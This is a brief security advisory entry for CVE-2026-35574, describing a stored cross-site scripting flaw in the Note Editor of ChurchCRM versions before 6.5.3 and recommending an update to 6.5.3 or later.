CVE-2026-35574

Name of the Vulnerable Software and Affected Versions ChurchCRM versions prior to 6.5.3

Description ChurchCRM, an open-source church management system, contains a stored Cross-Site Scripting (XSS) flaw in the Note Editor. Authenticated users with note-adding permissions can execute arbitrary JavaScript code in the context of other users’ browsers, including administrators. This could lead to session hijacking, privilege escalation, and unauthorized access to sensitive church member data.

Recommendations Update to version 6.5.3 or later.